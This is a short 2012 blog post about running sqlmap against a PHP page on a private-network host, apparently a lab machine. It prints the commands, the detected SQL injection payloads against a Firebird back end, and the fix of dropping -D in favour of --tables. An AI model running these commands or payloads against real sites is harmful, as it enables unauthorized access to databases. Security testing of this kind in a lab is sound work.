Tuesday, July 31, 2012

ignore switch -D on Firebird (SQLMAP)

hi there, i want to share my experience, 
i found an error on 192.168.56.102/index.php?page=beritaDetail&id=103, so i use sqlmap to retrive databases. i type on sqlmap
"./sqlmap.py -u "192.168.56.102/index.php?page=beritaDetail&id=103" -p id --level 3 --risk 3 --thread 8 --dbs" few minutes later, i have a problem, that my sqlmap can't retrieve the databases names.
this is the result :
"sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=beritaDetail&id=103' AND 6088=6088 AND 'lDMw'='lDMw

    Type: stacked queries
    Title: Firebird stacked queries (heavy query)
    Payload: page=beritaDetail&id=103'; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3;--
---

[14:16:45] [INFO] the back-end DBMS is Firebird

web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: Firebird 2.0
[14:16:45] [WARNING] on Firebird it is not possible to enumerate databases
[14:16:45] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.102'

[*] shutting down at 14:16:45
"
i try to read sqlmap user's manual on http://sqlmap.sourceforge.net/doc/README.html sqlmap support to attack this database(firebird),and this is list databases :

  • Firebird: python-kinterbasdb.
  • Microsoft Access: python-pyodbc.
  • Microsoft SQL Server: python-pymssql.
  • MySQL: python-mysqldb.
  • Oracle: python cx_Oracle.
  • PostgreSQL: python-psycopg2.
  • SQLite: python-pysqlite2.
  • Sybase: python-pymssql.
  • but why my sqlmap can retrieve the databases names.

     So, i ask to my friend how to get a solution. and he answer that it's means that sqlmap won't be able to retrieve databases names as everything is going in a single one. and  i just have --tables and i must ignore  switch -D on firebird (also the same on SQLite and MsAccess).

    so i try to ignore -D, likes this :
    "./sqlmap.py -u "192.168.56.102/index.php?page=beritaDetail&id=103" -p id --level 3 --risk 3 --thread 8 --dbms Firebird --tables" and what i see, i can through this problem, this is the result 
    "web application technology: PHP 5.3.1, Apache 2.2.14
    back-end DBMS: Firebird 2.0
    [14:33:30] [INFO] fetching tables for database: Firebird_masterdb
    [14:33:30] [INFO] fetching number of tables for database 'Firebird_masterdb'"